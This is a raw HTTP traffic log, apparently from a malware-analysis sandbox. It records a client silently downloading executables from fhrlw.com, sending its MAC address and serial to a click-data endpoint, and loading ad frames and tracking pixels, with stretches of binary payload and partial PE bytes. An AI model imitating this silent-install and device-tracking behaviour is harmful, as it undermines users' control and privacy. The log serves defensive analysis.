....{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..O
L...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...
I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.
b...n....X;....j.X$D..}....j6..)[email protected].............?F..^...!.....*.w.T
@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>
;. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^&l
t;..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,...
..`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.....
..E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9
.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A..
..#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.
......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.
<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!.
.e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<..
..O.....Q8..g.%..P.Y...`.N...t.#[email protected]=.qWD.7...x
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=819200-1024000
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 819200-1024000/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:53 GMT
.qb.........d>...Kcp..)`.`.j..X3y4Ei3..|$7.....xN.-/.0:.;.U........
.p......z......L.,.....|..=..3.....Cca^:..;.....'.])....!........%O.Y.
.M.DjK...8.[..QY.G............X.....:Gzc...tv...yu...,3k....Sc.(..hK..
.b..V..q..e...)./p..O....Q.h.......](....V.....L.T.F..\.8}..J.6SB.0...
..U.R..z9`I...[....{.1.`cB.n.c7US...&s..N..Fl.%.?&..........Z....VCr..
d.1 #=<.,.Ir.a.c......N..u%4..|m.I;R.}.......?..!!x....i&.3....X4a*
........F.........W.h.U....Mv0In..^.........a...Q3...$..z..i..W...nVt.
..."p..$.......L.:.V..b...)..*.....\.@4..|....F... .....].?.6r...rF%a.
c*>@*..vUp[..._.I...;.....]...>.N..I..f.....`.wcW..6..9Yp..#..!.
l.k....d..........e..4..!.....n.X.tS.|.A.lW.].`k.6. ~3/6/.[h"w..8..U.#
._......p....A...R.....g.6.-..Qrm..g.....4{.-.$...u?U....9......k...n.
...|.;E....(.>.1Z.\...f8l.n..u2..)....|...E....S.)(...#.....mX.HQ..
z.......Qh-Z..)S).T...([...[{Z(..t.;.a.b...2..............Y..IK ......
...[guE........`|...[[email protected]>N..LKD...!..&j
c..m....`...V3.hB....m...M...J....x..=ehO#.H..HC.._.?...N ...YwP.93...
..,.R6..;...=...{C..m.y4...u.h.......>.{n.....c(...0...r.".KzpR..c.
....0n.....7L^6.j...O....:.K>..!O..".K....x.c.....f.....w[.-....lO8
3.X.. ....P...)..v.C.......v..G.B.... ..........u.5.&....e....Z..y.Onc
N....!,aJ.{.....".....<3.;....Y..W......?...C!........c,.B.0...(s.x
..B.Jb~.7....a.X.......MW.:.X%.y^.@Z..!$:.uG.".Q...`.^<.1.....|.uF.
..O..LazL...TUUY..<d.Q?q...E.y..n...N.%...!.*..a...n6./k.J.M./)....
Lb......&U:o._.h..f.x..vL......fo=.{[email protected]..^..$.:........?Z...
<<< skipped >>>


GET /testgpimg/sogou_icon_short.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: image/png
Content-Length: 3528
Connection: keep-alive
Last-Modified: Wed, 23 Jan 2013 07:16:05 GMT
Expires: Sat, 14 Jun 2014 12:44:54 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
.PNG........IHDR.............2..5....pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<< skipped >>>


GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1024000-1228800
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1024000-1228800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
...y.5..7.W].n.:.0.......k../6.W..YqR:...|."9...$>^..d..W.Nh.D.>
.$s..ORJ.M..kA...-....P.^.Fu.........|.__u{..~......U.JZ..N.c.i..&..'t
..n.,9..b.h.f{P..}....E..c)........T%A.`.....T...5.......Ei....[.....s
..?...M.L.).....1......gjI0.=...Sz...;..H.S.o. 0'............~.%..&..n
..F..%..R...).x....E..5....Vw.......3;j<{7.5.F.....kT..F.....M....^
...V.q......3.{.yXV.;..y.?..r. 4"......!3J.......,~.M{.....{.....O...f
.....M.9M%..~LY..3H.S..R.i[FN..)...P..8{][email protected]!.aOE.....N E..c.x
%.2f..C.|....".b|..55........D.E........w.`$.`~5...A..3.5..9r..o..4._7
.v.....x.T..(.(.\.4...".......t.......t...V..<[email protected].
...'......Q...7.7M......6....p...8.{6T^"....B$...........S?..1.V....x.
l..j.q19...w..O....;y!Q....H..M)qn.o...&......=.tQ...$:.......)...|.b.
.u)|...g....{..Z.....C..$.zd....&.4... ..?!!..6.4,.?... T.u..}./..^.O.
>...Gy...[.........B......:..A.......ba..%n.3.o.vz..o.5..k....q.n..
.HE.(...}[.......I<g...2...%UP........}.c..............`.U(dT....w.
1.b...\C.f%.,.A.F....v.#.W/...q.F..Zu2...7"..I.....V ..AB.._2T...f....
.'&.~d..`..X;..~4...$....8V.._.........Sj.g..<W.BC...T.Ca.MD.w.Y.=.
.....,3..g_.........p.......z).B`.kL..n]{%#o.[uC,....v......l...\ ..5.
d..L.e...h..../..E.............X.G..0qzN.0..z...S.....nr.p...."U.'....
.2.B...]...o..W.V...h...~..}.^f..x..h.............."X)V....o..CX.m.M.t
.x.E..?...P$8.sIk...!"H...U=`.........xR......9.,o.....P8..{...o.NND..
.~..l.i....e......n.....&h{..=.h^r|g..v.0H...P.M.=\..t.N..i...4.n...0.
c...i.8.."~q.".IyZ.=1...e.=....y.......G.IX.r\p......$).#..N..P.0G
<<< skipped >>>


GET /slience/fhsli_6_12001.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: software.fhrlw.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 335364
Content-Type: application/octet-stream
Last-Modified: Wed, 28 May 2014 05:49:52 GMT
Accept-Ranges: bytes
ETag: "261b13a5387acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:31 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1...u...u...
u.......w...u...........d.......|.......t...Richu...................PE
..L.....UH.................b....... ..o5............@.................
.........0...........................................................@
......................................................................
.....................................text...x`.......b................
.. ..`.rdata...............f..............@[email protected]..
[email protected][email protected]....@....
...B..................@..@............................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected]...\.@
..}..e..9}[email protected]........ M............U....M....3...3..FQ
......3..NU.....M..........VT..U.....FP..E...............E.P.M...H.@..
E...E.P.E.P.u...`[email protected]}[email protected].}.j.W.E..
[email protected][email protected][email protected] [email protected]..
.u....E.P.u...h.@._^3.[.....L$....D...Si.. ..VW.T.....tO.q.3.;5..D.sB.
.i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..D.r._
<<< skipped >>>


GET /cs/jsfile/js/c.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: images.sohu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Server: FSS
Date: Sat, 14 Jun 2014 08:25:51 GMT
Last-Modified: Mon, 26 May 2014 07:18:20 GMT
Expires: Sat, 14 Jun 2014 09:25:51 GMT
Cache-Control: max-age=3600
Content-Encoding: gzip
FSS-Cache: HIT from 15041145.21594755.22842845
43a.............}.w.8.._Iu.z.Zq.g.;JO....L.6......Y.[.,9..........).I;
..o....... .. ...N.....,.$.....-....[;..T$i#=X.n.&.n._C....7.o..&....t
l.....2......4.|].<a@.<Y...:i-...s..p...q..y..Gyzw.....u...u..a&
lt;.....S.7..4.8....i6G..t...sl#Z..AB=[.jj.......NF9....0;.O.._g..$M..
e.p...!%.}.4......5.O0m..#H|?..nn.k..y.y.....mS.~.'.n.j.K'...Wi..j...}
...B.(...:.m..N..9.A..$.u...Y.....;?..c?-%R..._$I.;.q...*.w...-y.H...i
.....}qI. ..Q.....`n'...'.t.8....&.^.....O....'..Kc#.k...m......jA:..p
.....i.'. ...:Q............g8.......?...O.;}a ..:.......y.%./.%.>a.
DU...OIr..j.....1.Z.4.r.`.....{R~.2.:Q..o...k.gnF../[email protected]^].Y.\$..|
-g...H..WF.%....T..(..g/.s.v....zd.&.$....i..Er.h0i.....F..&........^.
...}.R...."t5.x.m..$...;....%?..U...R...^Co..[.U6....I..%(.'a.....O.I)
%..J..%...{...)......2{~quI...z.$3..$...t.....L.G&1.xF...*~*.........U
F....K..3.....F..D....  ..O.....e.....H].1..L$P..v...OL.O*..~=..h...4K
M..F...w.....m.....or.YV...V..Rw..H1..........;..6..t<gb.h.P.f.\..0
.....U3..g..(.m...&-.0...F...U....'...M.>..'>Z..G1.4...."&b.....
...v........A...R*..0c0..<[email protected]
......4.*.b}.......&....d..b..#/.>*....U"..I.....Y2.J5...-@C..$r...
..`V...5.-5r.....".70.X.d..T....< j..[^[email protected].......?.....
..f........$.s....uy).q.L./0Y...*.8......%.5s.=Rj.D*..2..R...K[<...
t.n...4a.....E.............j..(.i.8.=..a....<...i&....nY-K3y..%.G..
&7.W...w..E..;.g.....3..V.g..;........O.Opz.bk....Z4.Y.AOhR..B.|....K.
...:t>....HV..k..~...>.,s=f....lH.>g....4.....n...*..b...
<<< skipped >>>


GET /client/picchange.css HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 584
Content-Type: text/css
Last-Modified: Thu, 08 May 2014 04:11:16 GMT
Accept-Ranges: bytes
ETag: "fddeeb8e736acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
html, body, div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, 
form, fieldset, input, textarea, p, blockquote, th, td {..    margin: 
0;..    padding: 0;..}..ol, ul {..    list-style: none outside none;..
}...main{position: relative; width:340px;height: 60px;}...main div{wid
th:100%;overflow:hidden;}...main .adlist{display:none;}...main .sel{di
splay:block;}...showList{position:absolute;bottom:2px;right:0px;}...sh
owList li{float:left;width:8px;height:8px;background:#eaeaea;color:#ea
eaea;margin-right:5px;font-size:0;}...showList li.special{background:#
4384da;color:#4384da;}HTTP/1.1 200 OK..Content-Length: 584..Content-Ty
pe: text/css..Last-Modified: Thu, 08 May 2014 04:11:16 GMT..Accept-Ran
ges: bytes..ETag: "fddeeb8e736acf1:4d6"..Server: Microsoft-IIS/6.0..X-
Powered-By: ASP.NET..Date: Sat, 14 Jun 2014 09:01:24 GMT..html, body, 
div, dl, dt, dd, ul, ol, li, h1, h2, h3, h4, h5, h6, pre, form, fields
et, input, textarea, p, blockquote, th, td {..    margin: 0;..    padd
ing: 0;..}..ol, ul {..    list-style: none outside none;..}...main{pos
ition: relative; width:340px;height: 60px;}...main div{width:100%;over
flow:hidden;}...main .adlist{display:none;}...main .sel{display:block;
}...showList{position:absolute;bottom:2px;right:0px;}...showList li{fl
oat:left;width:8px;height:8px;background:#eaeaea;color:#eaeaea;margin-
right:5px;font-size:0;}...showList li.special{background:#4384da;color
:#4384da;}....
<<< skipped >>>

GET //js/picchange.js HTTP/1.1


Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 908
Content-Type: application/x-javascript
Last-Modified: Thu, 08 May 2014 03:52:46 GMT
Accept-Ranges: bytes
ETag: "eeb3d4f8706acf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:31 GMT
var thisIndex=0;..var bannerLength = $('.main .adlist').length;..for(i
=0; i<bannerLength; i  ){...$('.showList li').eq(i).text(i 1);..}..
function ChangePic()..{...indexobj = $('.showList li').eq(thisIndex);.
..$('.showList li').removeClass('special');...indexobj.toggleClass('sp
ecial');...obj = $('.main .adlist').eq(thisIndex);...$('.main div').re
moveClass('sel');...obj.addClass('sel');......thisIndex = thisIndex 1&
gt;=bannerLength? 0 : thisIndex 1;..}..  ..$('.main .adlist').hover(fu
nction(){...window.clearInterval(timer);..},function(){...timer = wind
ow.setInterval( "ChangePic()"  , 5000  );..})..$('.showList li').hover
(function(){...window.clearInterval(timer);...thisIndex = parseInt(thi
s.innerHTML) - 1;...ChangePic();..},function(){...timer = window.setIn
terval( "ChangePic()"  , 5000  );..})....$(function(){...  ...timer = 
window.setInterval( "ChangePic()"  , 5000  );...ChangePic();..})HTTP/1
.1 200 OK..Content-Length: 908..Content-Type: application/x-javascript
..Last-Modified: Thu, 08 May 2014 03:52:46 GMT..Accept-Ranges: bytes..
ETag: "eeb3d4f8706acf1:4d6"..Server: Microsoft-IIS/6.0..X-Powered-By: 
ASP.NET..Date: Sat, 14 Jun 2014 09:01:31 GMT..var thisIndex=0;..var ba
nnerLength = $('.main .adlist').length;..for(i=0; i<bannerLength; i
  ){...$('.showList li').eq(i).text(i 1);..}..function ChangePic()..{.
..indexobj = $('.showList li').eq(thisIndex);...$('.showList li').remo
veClass('special');...indexobj.toggleClass('special');...obj = $('.mai
n .adlist').eq(thisIndex);...$('.main div').removeClass('sel');...
<<< skipped >>>


GET /Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com


HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"errno":"1"}....


GET /ad/fixad.html?id=9995 HTTP/1.1


Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: client.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 14 Jun 2014 09:01:23 GMT
..<style type="text/css">..    body..    {..        margin: 0;..
        border: 0;..    }..</style>..<!DOCTYPE html PUBLIC "-
//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DT
D/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999
/xhtml">..<head><title>..</title><meta http-eq
uiv="refresh" content="600" />..    <link href="hXXp://img.fhrlw
.com/client/picchange.css"..        rel="stylesheet" type="text/css" /
>..   ..    <script src="hXXp://img.fhrlw.com/js/jquery-1.3.2.mi
n.js"..        type="text/javascript"></script>.. <script&
gt;.. window.onerror = function() { return true; };..     $(document).
ready(function() {..         $(document).bind("contextmenu", function(
e) {..             return false;..         });..     });..    </scr
ipt>..</head>..<body scroll="no">..    <div class="m
ain">..        <div class="adlist sel"><script type="text/
javascript">.var sogou_ad_id=341269;.var sogou_ad_height=60;.var so
gou_ad_width=460;.</script>.<script type=text/javascript src=
hXXp://images.sohu.com/cs/jsfile/js/c.js></script></div>
;<div class="adlist "><script type="text/javascript">.var 
sogou_ad_id=341269;.var sogou_ad_height=60;.var sogou_ad_width=460;.&l
t;/script>.<script type=text/javascript src=hXXp://images.sohu.c
om/cs/jsfile/js/c.js></script></div><div class="adli
st "><script type="text/javascript">.var sogou_ad_id=3412
<<< skipped >>>


GET /qi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata
=" width="1" height="1" border="0" alt="" style="border:none !importan
t; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..D
ate: Sat, 14 Jun 2014 09:00:44 GMT..Content-Type: text/html..Transfer-
Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<
;img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" widt
h="1" height="1" border="0" alt="" style="border:none !important; marg
in:0px !important;" />..0......


GET /pixel?tid=E0&ver=1&extendata= HTTP/1.1


Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=
Connection: Keep-Alive
Host: dspcm.brand.sogou.com


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
6..hello...0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 14 Jun 2014 0
9:00:46 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Conn
ection: keep-alive..Set-Cookie: YYID =..6..hello...0......


GET /qi HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@; YYID=


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata
=" width="1" height="1" border="0" alt="" style="border:none !importan
t; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..D
ate: Sat, 14 Jun 2014 09:00:47 GMT..Content-Type: text/html..Transfer-
Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<
;img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" widt
h="1" height="1" border="0" alt="" style="border:none !important; marg
in:0px !important;" />..0......


GET /qi HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dspcm.brand.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; YYID=


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: YYID =
a2..<img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata
=" width="1" height="1" border="0" alt="" style="border:none !importan
t; margin:0px !important;" />..0..HTTP/1.1 200 OK..Server: nginx..D
ate: Sat, 14 Jun 2014 09:00:47 GMT..Content-Type: text/html..Transfer-
Encoding: chunked..Connection: keep-alive..Set-Cookie: YYID =..a2..<
;img src="hXXp://acookie.tanx.com/cms.gif?id=40490128&extendata=" widt
h="1" height="1" border="0" alt="" style="border:none !important; marg
in:0px !important;" />..0..



GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,.
"m":"MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"19858
23318692344632".}});....


GET /ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
